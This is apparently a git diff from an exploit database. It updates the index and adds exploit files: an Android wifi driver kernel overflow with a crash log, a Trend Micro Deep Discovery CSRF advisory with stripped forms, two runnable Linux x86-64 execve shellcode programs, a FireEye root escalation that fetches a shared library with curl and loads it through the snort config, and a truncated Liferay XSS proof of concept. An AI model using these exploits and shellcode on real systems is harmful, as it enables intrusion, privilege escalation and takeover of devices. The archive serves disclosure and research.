Parameter Directory Traversal Vulnerability",2013-12-11,"High-Tech Bridge",php,webapps,0 38874,platforms/php/webapps/38874.txt,"BoastMachine 'blog' Parameter SQL Injection Vulnerablity",2013-12-13,"Omar Kurt",php,webapps,0 @@ -35710,7 +35710,7 @@ id,file,description,date,author,platform,type,port 39467,platforms/multiple/dos/39467.txt,"Adobe Flash - BitmapData.drawWithQuality Heap Overflow",2016-02-17,"Google Security Research",multiple,dos,0 39468,platforms/php/webapps/39468.txt,"Vesta Control Panel <= 0.9.8-15 - Persistent XSS Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0 39469,platforms/php/webapps/39469.txt,"DirectAdmin 1.491 - CSRF Vulnerability",2016-02-18,"Necmettin COSKUN",php,webapps,0 -39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability",2016-02-19,"Pawan Dxb",windows,dos,0 +39470,platforms/windows/dos/39470.py,"XM Easy Personal FTP Server 5.8 - (HELP) Remote DoS Vulnerability",2016-02-19,"Pawan Dxb",windows,dos,0 39471,platforms/windows/dos/39471.txt,"STIMS Buffer - Buffer Overflow SEH - DoS",2016-02-19,"Shantanu Khandelwal",windows,dos,0 39472,platforms/windows/dos/39472.txt,"STIMS Cutter - Buffer Overflow DoS",2016-02-19,"Shantanu Khandelwal",windows,dos,0 39473,platforms/php/webapps/39473.txt,"Chamilo LMS IDOR - (messageId) Delete POST Inject Vulnerability",2016-02-19,Vulnerability-Lab,php,webapps,0 @@ -35800,6 +35800,7 @@ id,file,description,date,author,platform,type,port 39562,platforms/windows/dos/39562.html,"Internet Explorer - Read AV in MSHTML!Layout::LayoutBuilderDivider::BuildPageLayout (MS16-023)",2016-03-14,"Google Security Research",windows,dos,0 39564,platforms/perl/webapps/39564.txt,"AKIPS Network Monitor 15.37 through 16.5 - OS Command Injection",2016-03-16,BrianWGray,perl,webapps,443 39565,platforms/windows/dos/39565.txt,"Netwrix Auditor 7.1.322.0 - ActiveX (sourceFile) Stack Buffer Overflow",2016-03-16,LiquidWorm,windows,dos,0 +39626,platforms/multiple/webapps/39626.txt,"Liferay Portal 5.1.2 - Persistent XSS",2016-03-28,"Sarim Kiani",multiple,webapps,80 39568,platforms/hardware/remote/39568.py,"Cisco UCS Manager 2.1(1b) - Shellshock Exploit",2016-03-16,thatchriseckert,hardware,remote,443 39569,platforms/multiple/remote/39569.py,"OpenSSH <= 7.2p1 - xauth Injection",2016-03-16,tintinweb,multiple,remote,22 39570,platforms/freebsd_x86-64/dos/39570.c,"FreeBSD 10.2 amd64 Kernel - amd64_set_ldt Heap Overflow",2016-03-16,"Core Security",freebsd_x86-64,dos,0 @@ -35828,6 +35829,7 @@ id,file,description,date,author,platform,type,port 39595,platforms/multiple/local/39595.txt,"OS X / iOS Suid Binary Logic Error Kernel Code Execution",2016-03-23,"Google Security Research",multiple,local,0 39596,platforms/hardware/remote/39596.py,"Multiple CCTV-DVR Vendors - Remote Code Execution",2016-03-23,K1P0D,hardware,remote,0 39597,platforms/multiple/webapps/39597.txt,"MiCollab 7.0 - SQL Injection Vulnerability",2016-03-23,"Goran Tuzovic",multiple,webapps,80 +39622,platforms/hardware/webapps/39622.txt,"Trend Micro Deep Discovery Inspector 3.8_ 3.7 - CSRF Vulnerabilities",2016-03-27,hyp3rlinx,hardware,webapps,80 39599,platforms/windows/remote/39599.txt,"Comodo Antivirus Forwards Emulated API Calls to the Real API During Scans",2016-03-23,"Google Security Research",windows,remote,0 39600,platforms/windows/dos/39600.txt,"Avira - Heap Underflow Parsing PE Section Headers",2016-03-23,"Google Security Research",windows,dos,0 39601,platforms/windows/dos/39601.txt,"Comodo - PackMan Unpacker Insufficient Parameter Validation",2016-03-23,"Google Security Research",windows,dos,0 @@ -35847,3 +35849,9 @@ id,file,description,date,author,platform,type,port 39615,platforms/osx/dos/39615.c,"OS X Kernel - Unchecked Array Index Used to Read Object Pointer Then Call Virtual Method in nVidia Geforce Driver",2016-03-23,"Google Security Research",osx,dos,0 39616,platforms/osx/dos/39616.c,"OS X Kernel Use-After-Free and Double Delete Due to Incorrect Locking in Intel GPU Driver",2016-03-23,"Google Security Research",osx,dos,0 39617,platforms/lin_x86-64/shellcode/39617.c,"Linux/x86_x64 - execve(/bin/sh) - 26 bytes",2016-03-24,"Ajith Kp",lin_x86-64,shellcode,0 +39624,platforms/lin_x86-64/shellcode/39624.c,"Linux/x86_x64 - execve(/bin/sh) - 25 bytes",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 +39625,platforms/lin_x86-64/shellcode/39625.c,"Linux/x86_x64 - execve(/bin/bash) - 33 bytes",2016-03-28,"Ajith Kp",lin_x86-64,shellcode,0 +39627,platforms/windows/dos/39627.py,"TallSoft SNMP TFTP Server 1.0.0 - Denial of Service",2016-03-28,"Charley Celice",windows,dos,69 +39628,platforms/linux/local/39628.txt,"FireEye - Privilege Escalation to root from Malware Input Processor (uid=mip)",2016-03-28,"Google Security Research",linux,local,0 +39629,platforms/android/dos/39629.txt,"Android One mt_wifi IOCTL_GET_STRUCT Privilege Escalation",2016-03-28,"Google Security Research",android,dos,0 +39630,platforms/windows/local/39630.g,"Cogent Datahub <= 7.3.9 Gamma Script Elevation of Privilege",2016-03-28,mr_me,windows,local,0 diff --git a/platforms/android/dos/39629.txt b/platforms/android/dos/39629.txt new file mode 100755 index 000000000..acbb5e6a7 --- /dev/null +++ b/platforms/android/dos/39629.txt @@ -0,0 +1,163 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=678 + +The wireless driver for the Android One (sprout) devices has a bad copy_from_user in the handling for the wireless driver socket private read ioctl IOCTL_GET_STRUCT with subcommand PRIV_CMD_SW_CTRL. + +This ioctl is permitted for access from the untrusted-app selinux domain, so this is an app-to-kernel privilege escalation from any app with android.permission.INTERNET. + +See ​ + hello-jni.tar.gz​ for a PoC (NDK required to build) that should redirect kernel code execution to 0x40404040. + +[ 56.843672]-(0)[880:tx_thread]CPU: 0 PID: 880 Comm: tx_thread Tainted: G W 3.10.57-g9e1c396 #1 +[ 56.844867]-(0)[880:tx_thread]task: dea3b480 ti: cb99e000 task.ti: cb99e000 +[ 56.845731]-(0)[880:tx_thread]PC is at 0x40404040 +[ 56.846319]-(0)[880:tx_thread]LR is at kalDevPortWrite+0x1c8/0x484 +[ 56.847092]-(0)[880:tx_thread]pc : [<40404040>] lr : [] psr: a0000013 +[ 56.847092]sp : cb99fdb0 ip : c001813c fp : cb99fe0c +[ 56.848705]-(0)[880:tx_thread]r10: c0cac2f0 r9 : 0000af00 r8 : 00000110 +[ 56.849552]-(0)[880:tx_thread]r7 : 0000002c r6 : cc0a63c0 r5 : 00000001 r4 : c0cade08 +[ 56.850560]-(0)[880:tx_thread]r3 : 40404040 r2 : 00000040 r1 : dd5d0110 r0 : 00000001 +[ 56.851570]-(0)[880:tx_thread]Flags: NzCv IRQs on FIQs on Mode SVC_32 ISA ARM Segment kernel +[ 56.852675]-(0)[880:tx_thread]Control: 10c5387d Table: 9e9b006a DAC: 00000015 +[ 56.853585]-(0)[880:tx_thread] +[ 56.853585]LR: 0xc0408b64: +[ 56.854297]8b64 e50b3028 e3a03000 e50b3044 0a00008a e590c0d0 e30639ac e34c30a8 e35c0000 +[ 56.855306]8b84 01a0c003 e2851103 e30c3940 e34c30bc e7eb2055 e1a01621 e3a05001 e593e000 +[ 56.856314]8ba4 e3a03000 e1a01281 e58d3004 e28114ff e58d5000 e1a03008 e08e1001 e59cc010 +[ 56.857323]8bc4 e12fff3c e5943014 e3530000 e50b002c 0a000002 e5933018 e1a00005 e12fff33 +[ 56.858332]8be4 e59635cc e2867e5a e2877004 e24b1048 e30650c0 e34c50a6 e1a00007 e5933000 +[ 56.859340]8c04 e12fff33 e59635cc e1a00007 e5933004 e12fff33 e5959000 e2899f7d e5953000 +[ 56.860349]8c24 e30610c0 e1a00007 e34c10a6 e0693003 e3530000 aa00005b e59635cc e5933010 +[ 56.861358]8c44 e12fff33 e3500000 0afffff3 e59635cc e1a00007 e30856a1 e3405001 e5933014 +[ 56.862369]-(0)[880:tx_thread] +[ 56.862369]SP: 0xcb99fd30: +[ 56.863083]fd30 00000001 00000110 00000000 40404040 a0000013 ffffffff cb99fd9c 00000110 +[ 56.864091]fd50 0000af00 c0cac2f0 cb99fe0c cb99fd68 c000e1d8 c00084b8 00000001 dd5d0110 +[ 56.865100]fd70 00000040 40404040 c0cade08 00000001 cc0a63c0 0000002c 00000110 0000af00 +[ 56.866108]fd90 c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013 ffffffff +[ 56.867117]fdb0 00000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000 00000000 +[ 56.868126]fdd0 cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168 e54af000 +[ 56.869135]fdf0 e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164 c0408a28 +[ 56.870143]fe10 0000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10 e54b5d14 +[ 56.871155]-(0)[880:tx_thread] +[ 56.871155]IP: 0xc00180bc: +[ 56.871868]80bc ee070f36 e0800002 e1500001 3afffffb f57ff04f e1a0f00e ee103f30 e1a03823 +[ 56.872877]80dc e203300f e3a02004 e1a02312 e2423001 e1c00003 ee070f3a e0800002 e1500001 +[ 56.873885]80fc 3afffffb f57ff04f e1a0f00e ee103f30 e1a03823 e203300f e3a02004 e1a02312 +[ 56.874894]811c e2423001 e1c00003 ee070f3e e0800002 e1500001 3afffffb f57ff04f e1a0f00e +[ 56.875902]813c e0811000 e3320002 0affffd0 eaffffe1 e0811000 e3320001 1affffcc e1a0f00e +[ 56.876911]815c 00007fff 000003ff e1a0c00d e92dd830 e24cb004 e1a05000 e1a00001 ebfffe6a +[ 56.877920]817c e1a04000 e1a00005 ebfffe67 e1a01004 e1a05000 eb09bf2a e1a00005 ebfffeaa +[ 56.878929]819c e1a00004 ebfffea8 e89da830 e1a0c00d e92dd818 e24cb004 ebfffe5b e3a01a01 +[ 56.879940]-(0)[880:tx_thread] +[ 56.879940]FP: 0xcb99fd8c: +[ 56.880653]fd8c 0000af00 c0cac2f0 cb99fe0c c001813c cb99fdb0 c0408be4 40404040 a0000013 +[ 56.881662]fdac ffffffff 00000001 00000000 c07aeeb8 c029c4b0 c0b9d340 00000110 00000000 +[ 56.882671]fdcc 00000000 cb99fdf4 cb99fde0 c07aef68 c009d670 9d5d0000 180f002c e54b6168 +[ 56.883679]fdec e54af000 e54b5d10 00000110 dd5d0000 00000000 cb99fe6c cb99fe10 c03db164 +[ 56.884688]fe0c c0408a28 0000af00 00000004 cb99fe44 cb99fe28 c03eddf4 00000001 00007d10 +[ 56.885697]fe2c e54b5d14 e54af000 00000000 cb99fe6c cb99fe48 c03da49c e54b6168 e54af000 +[ 56.886705]fe4c c0cac2f0 00000000 e54af000 00000000 c0cac2f0 cb99fe8c cb99fe70 c03bd0f4 +[ 56.887714]fe6c c03dae1c 00000001 00000000 e54b6168 00000000 cb99fee4 cb99fe90 c03bd540 +[ 56.888726]-(0)[880:tx_thread] +[ 56.888726]R1: 0xdd5d0090: +[ 56.889439]0090 00000002 60070193 c0a9d860 00000001 00000003 0d050d04 60070193 60070193 +[ 56.890447]00b0 c0a8d800 00002ab0 cb99fe9c cb99fe50 c00d3a84 c001ee84 0b93115f 00000000 +[ 56.891456]00d0 ffffffff 00000000 00000036 00000000 75fd19aa cb99fea0 e54dfac4 e54dfab8 +[ 56.892465]00f0 e54dfac4 60070113 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99fec4 062e062d +[ 56.893473]0110 00000000 c2ec5c43 e91cd01a 3ef74ed2 256fb013 c9a73709 0d15c700 aa03b775 +[ 56.894482]0130 10b66433 696d6e70 4f66e845 6fc5d5f5 fffd363f a9960104 61007ab4 5b193ffc +[ 56.895491]0150 25b0d02e 7fbf9ac1 c3de7bb9 b7bc184f 47c837ed 0d3b82cd aa3d7d38 72ac0fad +[ 56.896499]0170 a469220b 96e646bc 49677d77 a6fae9d7 2d03b2c7 a52e0556 16f0641d 96c95111 +[ 56.897511]-(0)[880:tx_thread] +[ 56.897511]R4: 0xc0cadd88: +[ 56.898224]dd88 c0cadc88 41414141 41414141 41414141 41414141 41414141 41414141 41414141 +[ 56.899233]dda8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 +[ 56.900241]ddc8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 +[ 56.901250]dde8 41414141 41414141 41414141 41414141 41414141 41414141 41414141 41414141 +[ 56.902259]de08 41414142 41414141 41414141 41414141 41414141 c0cadc90 000001d3 000001d3 +[ 56.903267]de28 000001d2 000000ca 000000c7 00000000 00000000 00000000 00000000 00000000 +[ 56.904276]de48 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.905285]de68 00000000 00000000 c04265ec 00000000 00000000 00000000 00000000 00000000 +[ 56.906297]-(0)[880:tx_thread] +[ 56.906297]R6: 0xcc0a6340: +[ 56.907009]6340 00000000 00000000 00000000 dead4ead ffffffff ffffffff cc0a6358 cc0a6358 +[ 56.908018]6360 df8f9674 dfba8764 df8f9684 00000001 c0b45604 00000000 00000000 00000000 +[ 56.909027]6380 00000001 de764130 00000000 00000000 c080e18c 00000000 00000000 00000000 +[ 56.910035]63a0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.911044]63c0 dd9e1000 00000000 00000075 0000007f 0000a051 00006107 00000000 00000000 +[ 56.912053]63e0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.913062]6400 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.914070]6420 00000000 cb000000 00000700 00000000 00000000 00000000 00000000 00000000 +[ 56.915082]-(0)[880:tx_thread] +[ 56.915082]R10: 0xc0cac270: +[ 56.915806]c270 7f54e330 00000000 7f54e330 00000000 7f5b84c9 00000004 00000000 00000000 +[ 56.916814]c290 00000000 00000000 00000001 00000001 00000001 00000000 00000000 00000000 +[ 56.917823]c2b0 00000001 00000000 dead4ead ffffffff ffffffff c0cac2c4 c0cac2c4 00000000 +[ 56.918832]c2d0 00000000 00000001 600f0113 000c000c dead4ead ffffffff ffffffff 00000000 +[ 56.919840]c2f0 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.920849]c310 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.921858]c330 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.922866]c350 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.923880]-(0)[880:tx_thread]Process tx_thread (pid: 880, stack limit = 0xcb99e248) +[ 56.924845]-(0)[880:tx_thread]Stack: (0xcb99fdb0 to 0xcb9a0000) +[ 56.925584]-(0)[880:tx_thread]fda0: 00000001 00000000 c07aeeb8 c029c4b0 +[ 56.926801]-(0)[880:tx_thread]fdc0: c0b9d340 00000110 00000000 00000000 cb99fdf4 cb99fde0 c07aef68 c009d670 +[ 56.928016]-(0)[880:tx_thread]fde0: 9d5d0000 180f002c e54b6168 e54af000 e54b5d10 00000110 dd5d0000 00000000 +[ 56.929230]-(0)[880:tx_thread]fe00: cb99fe6c cb99fe10 c03db164 c0408a28 0000af00 00000004 cb99fe44 cb99fe28 +[ 56.930445]-(0)[880:tx_thread]fe20: c03eddf4 00000001 00007d10 e54b5d14 e54af000 00000000 cb99fe6c cb99fe48 +[ 56.931660]-(0)[880:tx_thread]fe40: c03da49c e54b6168 e54af000 c0cac2f0 00000000 e54af000 00000000 c0cac2f0 +[ 56.932874]-(0)[880:tx_thread]fe60: cb99fe8c cb99fe70 c03bd0f4 c03dae1c 00000001 00000000 e54b6168 00000000 +[ 56.934089]-(0)[880:tx_thread]fe80: cb99fee4 cb99fe90 c03bd540 c03bcf6c 000007d0 cc0a63c0 00000000 00000000 +[ 56.935304]-(0)[880:tx_thread]fea0: c000009a cc0a6a50 00000000 00000000 cc0a65f8 80000013 cc0a6464 cc0a63c0 +[ 56.936519]-(0)[880:tx_thread]fec0: cc0a6a5c cb99e000 cc0a65f8 c0cac730 cc0a6464 c0cac2f0 cb99ff44 cb99fee8 +[ 56.937734]-(0)[880:tx_thread]fee0: c03efce4 c03bd300 dd6b1dd4 a0070013 c0cade28 cb99e028 c0090920 cc0a6a50 +[ 56.938948]-(0)[880:tx_thread]ff00: 01a5fc40 00000000 dea3b480 c0090920 cb99ff10 cb99ff10 c03ef9d4 dd5bfdbc +[ 56.940163]-(0)[880:tx_thread]ff20: 00000000 dd9e1000 c03ef9d4 00000000 00000000 00000000 cb99ffac cb99ff48 +[ 56.941378]-(0)[880:tx_thread]ff40: c008fadc c03ef9e0 ffffffff 00000000 df9958c0 dd9e1000 00000000 00000000 +[ 56.942593]-(0)[880:tx_thread]ff60: dead4ead ffffffff ffffffff cb99ff6c cb99ff6c 00000000 00000000 dead4ead +[ 56.943807]-(0)[880:tx_thread]ff80: ffffffff ffffffff cb99ff88 cb99ff88 dd5bfdbc c008fa20 00000000 00000000 +[ 56.945022]-(0)[880:tx_thread]ffa0: 00000000 cb99ffb0 c000e618 c008fa2c 00000000 00000000 00000000 00000000 +[ 56.946236]-(0)[880:tx_thread]ffc0: 00000000 00000000 00000000 00000000 00000000 00000000 00000000 00000000 +[ 56.947452]-(0)[880:tx_thread]ffe0: 00000000 00000000 00000000 00000000 00000013 00000000 ffffffff ffffffff +[ 56.948658]Backtrace: +[ 56.948966]-(0)[880:tx_thread][] (kalDevPortWrite+0x0/0x484) from [] (nicTxCmd+0x354/0x638) +[ 56.950213] r9:00000000 r8:dd5d0000 r7:00000110 r6:e54b5d10 r5:e54af000 +r4:e54b6168 +[ 56.951190]-(0)[880:tx_thread][] (nicTxCmd+0x0/0x638) from [] (wlanSendCommand+0x194/0x220) +[ 56.952449]-(0)[880:tx_thread][] (wlanSendCommand+0x0/0x220) from [] (wlanProcessCommandQueue+0x24c/0x474) +[ 56.953859] r6:00000000 r5:e54b6168 r4:00000000 r3:00000001 +[ 56.954568]-(0)[880:tx_thread][] (wlanProcessCommandQueue+0x0/0x474) from [] (tx_thread+0x310/0x640) +[ 56.955927]-(0)[880:tx_thread][] (tx_thread+0x0/0x640) from [] (kthread+0xbc/0xc0) +[ 56.957088]-(0)[880:tx_thread][] (kthread+0x0/0xc0) from [] (ret_from_fork+0x14/0x3c) +[ 56.958270] r7:00000000 r6:00000000 r5:c008fa20 r4:dd5bfdbc +[ 56.958970]-(0)[880:tx_thread]Code: bad PC value +[ 56.959544]-(0)[880:tx_thread]---[ end trace 1b75b31a2719ed1f ]--- +[ 56.960313]-(0)[880:tx_thread]Kernel panic - not syncing: Fatal exception + +The vulnerable code is in /drivers/misc/mediatek/conn_soc/drv_wlan/mt_wifi/wlan/os/linux/gl_wext_priv.c:1632 + + case PRIV_CMD_SW_CTRL: + pu4IntBuf = (PUINT_32)prIwReqData->data.pointer; + prNdisReq = (P_NDIS_TRANSPORT_STRUCT) &aucOidBuf[0]; + + //kalMemCopy(&prNdisReq->ndisOidContent[0], prIwReqData->data.pointer, 8); + if (copy_from_user(&prNdisReq->ndisOidContent[0], + prIwReqData->data.pointer, + prIwReqData->data.length)) { + status = -EFAULT; + break; + } + prNdisReq->ndisOidCmd = OID_CUSTOM_SW_CTRL; + prNdisReq->inNdisOidlength = 8; + prNdisReq->outNdisOidLength = 8; + + /* Execute this OID */ + status = priv_set_ndis(prNetDev, prNdisReq, &u4BufLen); + break; + +prNdisReq->ndisOidContent is in a static allocation of size 0x1000, and prIwReqData->data.length is a usermode controlled unsigned short, so the copy_from_user results in memory corruption. + + +Proof of Concept: +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/39629.zip + diff --git a/platforms/hardware/webapps/39622.txt b/platforms/hardware/webapps/39622.txt new file mode 100755 index 000000000..8ea95380f --- /dev/null +++ b/platforms/hardware/webapps/39622.txt @@ -0,0 +1,360 @@ +[+] Credits: John Page aka hyp3rlinx + +[+] Website: hyp3rlinx.altervista.org + +[+] Source: +http://hyp3rlinx.altervista.org/advisories/TRENDMICRO-DDI-CSRF.txt + + +Vendor: +==================== +www.trendmicro.com + + +Product: +========================================= +Trend Micro Deep Discovery Inspector +V3.8, 3.7 + +Deep Discovery Inspector is a network appliance that gives you 360-degree +network monitoring of all traffic +to detect all aspects of a targeted attack. + + +Vulnerability Type: +================================ +Cross Site Request Forgery - CSRF + + +CVE Reference: +============== +N/A + + +Vulnerability Details: +================================ + +Trend Micro Deep Discovery suffers from multiple CSRF vectors, if an +authenticated user visits an malicious webpage attackers will +have ability to modify many settings of the Deep Discovery application to +that of the attackers choosing. + + +Reference: +http://esupport.trendmicro.com/solution/en-US/1113708.aspx + +Trend Micro DDI is affected by CSRF vulnerabilities. These affect the +following console features: + +Deny List Notifications +Detection Rules +Threat Detections +Email Settings +Network +Blacklisting/Whitelisting +Time +Accounts +Power Off / Restart +DETAILS +The following DDI versions prior to version 3.8 Service Pack 2 (SP2) are +affected: + +3.8 English +3.8 Japanese +3.7 English +3.7 Japanese +3.7 Simplified Chinese +Trend Micro has released DDI 3.8 SP2. All versions up to version 3.8 SP1 +must upgrade to version 3.8 SP2 (Build 3.82.1133) to address this issue. + + +Exploit code(s): +=============== + + +1) Shut down all threat scans and malicious file submissions under: + Administration /Monitoring / Scanning / Threat Detections + + + +
+ + + + + + + + + +
+ + +2) Whitelist C&C server menu location: Detections / C&C Callback Addresses + +
+ + + + + +
+ + +3) Turn off or change email notifications + +
+ + + + + + + + + + + + + + + + + + + + + +
+ +4) Change system settings ( x.x.x.x = whatever IP we want ) + +
+ + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + + +
+ + +Disclosure Timeline: +======================================= +Vendor Notification: November 23, 2015 +March 25, 2016 : Public Disclosure + + +Exploitation Technique: +======================= +Remote + + +Severity Level: +================ +High + + +Description: +======================================================================== + +Request Method(s): [+] POST + + +Vulnerable Product: [+] Trend Micro Deep Discovery Inspector V3.8 + + +======================================================================== + +[+] Disclaimer +Permission is hereby granted for the redistribution of this advisory, +provided that it is not altered except by reformatting it, and that due +credit is given. Permission is explicitly given for insertion in +vulnerability databases and similar, provided that due credit is given to +the author. +The author is not responsible for any misuse of the information contained +herein and prohibits any malicious use of all security related information +or exploits by the author or elsewhere. + +by hyp3rlinx diff --git a/platforms/lin_x86-64/shellcode/39624.c b/platforms/lin_x86-64/shellcode/39624.c new file mode 100755 index 000000000..1849e3b43 --- /dev/null +++ b/platforms/lin_x86-64/shellcode/39624.c @@ -0,0 +1,51 @@ +/* +--------------------------------------------------------------------------------------------------- + +Linux/x86_x64 - execve(/bin/sh) - 25 bytes + +Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] + +Om Asato Maa Sad-Gamaya | +Tamaso Maa Jyotir-Gamaya | +Mrtyor-Maa Amrtam Gamaya | +Om Shaantih Shaantih Shaantih | + +Thanks for Unknown Commented in my Blog + +--------------------------------------------------------------------------------------------------- +Disassembly of section .text: + +0000000000400080 <.text>: + 400080: eb 0b jmp 0x40008d + 400082: 5f pop rdi + 400083: 48 31 d2 xor rdx,rdx + 400086: 52 push rdx + 400087: 5e pop rsi + 400088: 6a 3b push 0x3b + 40008a: 58 pop rax + 40008b: 0f 05 syscall + 40008d: e8 f0 ff ff ff call 0x400082 + 400092: 2f (bad) + 400093: 62 (bad) + 400094: 69 .byte 0x69 + 400095: 6e outs dx,BYTE PTR ds:[rsi] + 400096: 2f (bad) + 400097: 73 68 jae 0x400101 +--------------------------------------------------------------------------------------------------- + +How To Run + +$ gcc -o sh_shell sh_shell.c +$ execstack -s sh_shell +$ ./sh_shell + +--------------------------------------------------------------------------------------------------- +*/ +#include +char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x62\x69\x6e\x2f\x73\x68"; +void main(int argc, char **argv) +{ + int (*func)(); + func = (int (*)()) sh; + (int)(*func)(); +} diff --git a/platforms/lin_x86-64/shellcode/39625.c b/platforms/lin_x86-64/shellcode/39625.c new file mode 100755 index 000000000..8ea5d36cc --- /dev/null +++ b/platforms/lin_x86-64/shellcode/39625.c @@ -0,0 +1,52 @@ +/* +--------------------------------------------------------------------------------------------------- + +Linux/x86_x64 - execve(/bin/bash) - 33 bytes + +Ajith Kp [ @ajithkp560 ] [ http://www.terminalcoders.blogspot.com ] + +Om Asato Maa Sad-Gamaya | +Tamaso Maa Jyotir-Gamaya | +Mrtyor-Maa Amrtam Gamaya | +Om Shaantih Shaantih Shaantih | + +--------------------------------------------------------------------------------------------------- +Disassembly of section .text: + +0000000000400080 <.text>: + 400080: eb 0b jmp 0x40008d + 400082: 5f pop rdi + 400083: 48 31 d2 xor rdx,rdx + 400086: 52 push rdx + 400087: 5e pop rsi + 400088: 6a 3b push 0x3b + 40008a: 58 pop rax + 40008b: 0f 05 syscall + 40008d: e8 f0 ff ff ff call 0x400082 + 400092: 2f (bad) + 400093: 2f (bad) + 400094: 2f (bad) + 400095: 2f (bad) + 400096: 62 (bad) + 400097: 69 6e 2f 2f 2f 2f 2f imul ebp,DWORD PTR [rsi+0x2f],0x2f2f2f2f + 40009e: 62 .byte 0x62 + 40009f: 61 (bad) + 4000a0: 73 68 jae 0x40010a +--------------------------------------------------------------------------------------------------- + +How To Run + +$ gcc -o bash_shell bash_shell.c +$ execstack -s bash_shell +$ ./bash_shell + +--------------------------------------------------------------------------------------------------- +*/ +#include +char sh[]="\xeb\x0b\x5f\x48\x31\xd2\x52\x5e\x6a\x3b\x58\x0f\x05\xe8\xf0\xff\xff\xff\x2f\x2f\x2f\x2f\x62\x69\x6e\x2f\x2f\x2f\x2f\x62\x61\x73\x68"; +void main(int argc, char **argv) +{ + int (*func)(); + func = (int (*)()) sh; + (int)(*func)(); +} diff --git a/platforms/linux/local/39628.txt b/platforms/linux/local/39628.txt new file mode 100755 index 000000000..616564ea0 --- /dev/null +++ b/platforms/linux/local/39628.txt @@ -0,0 +1,38 @@ +Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=670 + +The mip user is already quite privileged, capable of accessing sensitive network data. However, as the child process has supplementary gid contents, there is a very simple privilege escalation to root. This is because the snort configuration is writable by that group: + +$ ls -l /data/snort/config/snort.conf +-rw-rw-r-- 1 fenet contents 1332 Dec 2 18:02 /data/snort/config/snort.conf + +This can be exploited by placing a shared library in a writable directory that is mounted with the “exec” option, and appending a “dynamicengine” directive to the snort configuration. + +# mount | grep -v noexec | grep rw +... +/dev/sda8 on /var type ext4 (rw,noatime) +/dev/sda11 on /data type ext4 (rw,noatime) +/dev/sda9 on /data/db type ext4 (rw,noatime,barrier=0) +tmpfs on /dev/shm type tmpfs (rw) + +It looks like /dev/shm is a good candidate for storing a shared library. + +First, I create and compile a shared library on my workstation, as there is no compiler available on the FireEye appliance: + +$ cat test.c +void __attribute__((constructor)) init(void) +{ + system("/usr/bin/id > /tmp/output.txt"); +} +$ gcc test.c -shared -s -fPIC -o test.so + +Now fetch that object on the FireEye machine, and instruct snort to load it: + +fireeye$ curl http://example.com/test.so > /dev/shm/test.so +fireeye$ printf “dynamicengine /dev/shm/test.so\n” >> /data/snort/config/snort.conf + +The snort process is regularly restarted to process new rules, so simply wait for the snort process to respawn, and verify we were able to execute commands as root: + +fireeye$ cat /tmp/output.txt +uid=0(admin) gid=0(root) groups=0(root) + +And now we’re root, with complete control of the FireEye machine. We can load a rootkit, persist across reboots or factory resets, inspect or modify traffic, or perform any other action. diff --git a/platforms/multiple/webapps/39626.txt b/platforms/multiple/webapps/39626.txt new file mode 100755 index 000000000..cd03ba18e --- /dev/null +++ b/platforms/multiple/webapps/39626.txt @@ -0,0 +1,43 @@ +#Exploit Title: Liferay Portal 5.1.2 - Persistent XSS +#Discovery Date: 2016-02-10 +#Exploit Author: Sarim Kiani +#Vendor Homepage: https://www.liferay.com +#Software Link: https://www.liferay.com/community/releases +#Version: 5.1.2 +#Tested on: Windows OS + +Liferay Portal 5.1.2 is an open source version of Liferay's enterprise web platform for building business solutions that deliver immediate results and long-term value. + +1. Vulnerability Description: + +A persistent XSS exists in "My Account" page of the application. + +2. Proof of Concept: + +Any user entering personal information in the "My Account" page of the application can insert XSS Payload in the Form. + +Test Payload: "> + +Parameter: _79_jobTitle +Parameter Name: Job Title + +POST /user/test/home?p_p_id=79&p_p_lifecycle=1&p_p_state=maximized&p_p_mode=view&_79_struts_action=%2Fenterprise_admin%2Fedit_user HTTP/1.1 +Host: localhost:8082 +Content-Length: 2712 +Cache-Control: max-age=0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8 +Origin: http://localhost:8082 +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.87 Safari/537.36 +Content-Type: application/x-www-form-urlencoded +Referer: 